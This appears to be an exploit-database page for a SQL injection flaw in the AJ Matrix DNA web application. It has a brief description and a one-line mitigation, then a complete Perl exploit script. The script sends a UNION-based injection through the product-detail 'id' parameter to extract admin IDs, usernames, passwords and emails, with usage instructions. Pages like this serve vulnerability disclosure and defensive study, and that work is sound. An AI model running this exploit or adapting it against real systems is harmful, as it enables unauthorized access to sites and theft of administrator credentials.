header-logo
Suggest Exploit
vendor:
AJ Matrix DNA
by:
Br0ly
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: AJ Matrix DNA
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

AJ Matrix DNA Sql Injection

AJ Matrix DNA is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to the admin credentials. The attacker can send a specially crafted SQL query to the vulnerable application and gain access to the admin credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
# 
#| -Name: AJ Matrix DNA
#| -Site: http://www.ajsquare.com/ajhome.php
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , Out0fBound
#|
#| -p0c:
#| -SQL INJECTION: 
#|  
#| -9999+union+all+select+0,1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15--
#|
#|  --------------------------------------
#|  -AJ Matrix DNA		           
#|   -Sql Injection                       
#|   -by Br0ly                            
#|  --------------------------------------
#|
#|
#|
#|
#| >D, And sorry for my bad english ;/
#|
#|

  use IO::Socket::INET;
  use LWP::UserAgent;
  
   my $host    = $ARGV[0];
   my $sql_path = "/index.php?do=productdetail&id=";
    
  
  if (@ARGV < 1) {
      &banner();
      &help("-1");
  }

  elsif(cheek($host) == 1) {
	  &banner();
	  &xploit($host,$sql_path);
  }
  
  else {
      &banner();
      help("-2");
  }
  
  sub xploit() {

      my $host     = $_[0];
      my $sql_path = $_[1];

      print "[+] Getting the id,login,pass,status of the admin.\n";

      my $sql_atk = $host.$sql_path."-9999+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x6272306c79,0x3a,admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_status,0x3a,admin_email,0x3a,0x6272306c79)+from+ajmatrix_admin_table--";
      my $sql_get = get_url($sql_atk);
      my $connect = tag($sql_get); 
      
      if($connect =~ /br0ly:(.+):(.+):(.+):(.+):(.+):br0ly/) {
	print "[+] ID     = $1\n";
	print "[+] User   = $2\n";
	print "[+] Pass   = $3\n";
	print "[+] Status = $4\n";
	print "[+] Email  = $5\n";
	exit(0);
      }
      else {
	print "[-] Exploit, Fail\n";
	exit(0);
      
      }
 }

   sub get_url() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);
    my $response = $ua->request($req);
    return $response->content;
  }

  sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;
    return($string);
  }

  sub cheek() {
    my $host  = $_[0];
    if ($host =~ /http:\/\/(.*)/) {
        return 1;
    }
    else {
        return 0;
    }
  }

  sub help() {

    my $error = $_[0];
    if ($error == -1) {
        print "\n[-] Error, missed some arguments !\n\n";
    }
    
    elsif ($error == -2) {

        print "\n[-] Error, Bad arguments !\n";
    }
  
    print "[*] Usage : perl $0 http://localhost/ajmatrixdna/\n\n";
    print "    Ex:     perl $0 http://localhost/ajmatrixdna/\n\n";
    exit(0);
  }

  sub banner {
    print "\n".
          "  --------------------------------------\n".
          "   -AJ Matrix DNA		           \n".
          "   -Sql Injection                       \n".
          "   -by Br0ly                            \n".
          "  --------------------------------------\n\n";
  }

Navigation

Suggest Exploit

Services By CQR